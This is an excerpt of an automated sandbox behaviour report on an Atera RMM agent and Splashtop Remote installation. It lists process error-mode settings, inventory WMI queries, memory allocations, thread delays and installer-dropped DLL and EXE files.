                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Process information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDrive
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\ROOT\cimv2:Win32_DiskDrive.DeviceID="\\\\.\\PHYSICALDRIVE0"} where resultclass = Win32_DiskPartition
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Antecedent="Win32_DiskDrive.DeviceID=\"\\\\\\\\.\\\\PHYSICALDRIVE0\""
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapter
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select PhysicalAdapter,Name,PNPDeviceID from Win32_NetworkAdapter
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : select Name,DisplayName,Description,State from Win32_Service
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID="Disk #0, Partition #0"} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #0\""
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID="Disk #0, Partition #1"} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #1\""
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID="Disk #0, Partition #2"} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #2\""
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Size,FreeSpace,Name FROM Win32_LogicalDisk where DriveType=3
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #0&quot;} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #0\&quot;&quot;
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #1&quot;} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select Name from Win32_SoundDevice
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Memory allocated: 1C5CB7A0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Memory allocated: 1C5E50D0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Memory allocated: 20AA0B00000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Memory allocated: 20AB8FC0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Memory allocated: 1BE62660000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Memory allocated: 1BE7ABE0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Memory allocated: 2696EC80000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Memory allocated: 2696F200000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Memory allocated: 16BD0F80000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Memory allocated: 16BE95B0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Memory allocated: 2E94ED70000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Memory allocated: 2E967490000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Memory allocated: 21719860000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Memory allocated: 21731F40000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Thread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Thread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Thread delayed: delay time: 600000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Thread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Thread delayed: delay time: 600000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Window / User API: threadDelayed 2349
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Window / User API: threadDelayed 7356
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Window / User API: threadDelayed 8078
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Window / User API: threadDelayed 1444
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Window / User API: threadDelayed 4117
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Window / User API: threadDelayed 5755
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Window / User API: threadDelayed 6283
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Window / User API: threadDelayed 3519
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\VirtualDriver\utils\DIFxCmd.exe
                                Source: C:\Windows\SysWOW64\msiexec.exe Dropped PE file which has not been started: C:\Windows\Temp\{67C8555A-C946-4EFE-94E2-31ABF84FC74E}\_isres_0x0409.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.AgentPackages.CommonLib.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\CredentialManagement.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.Json.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.CommonLib.dll
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Text.Encoding.dll
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Drawing.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Dynamic.Runtime.dll
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\utils\DIFxCmd.exe
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Newtonsoft.Json.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\plugin\SRAppAnnotation.dll
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.NetworkInformation.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Interop.WUApiLib.dll
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Cryptography.Encoding.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\NLog.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Data.SQLite.dll
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Serialization.Primitives.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\System.ValueTuple.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\log4net.dll
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\vista64\driver\mv2.dll
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\64bits\xdbook.dll
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Linq.Queryable.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Collections.Concurrent.dll
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Cryptography.OpenSsl.dll
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\Microsoft.CSharp.dll
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Text.Encoding.CodePages.dll
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI172D.tmp
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSIC672.tmp
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-sysinfo-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSIFB85.tmp
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\64bits\xdsmplui.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.ThreadPool.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Dropped PE file which has not been started: C:\Windows\Temp\{87AA7DD5-455D-434C-80E8-C02BAF62BC90}\_isres_0x0409.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.Pipes.dll
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\GamePad\utils\DIFxCmd.exe
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.FileExtensions.dll
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVSpk\utils\devcon64.exe
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win10\x86\my_setup.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.FileSystem.Primitives.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRx264WrapperEx.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\32bits\xdnup.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRDxgiHelper.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\avutil-55.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\lib\net6.0\System.Diagnostics.EventLog.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Atera.Agent.Package.Infrastructure.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\plugin\SRAppBrowser.dllJump to dropped file
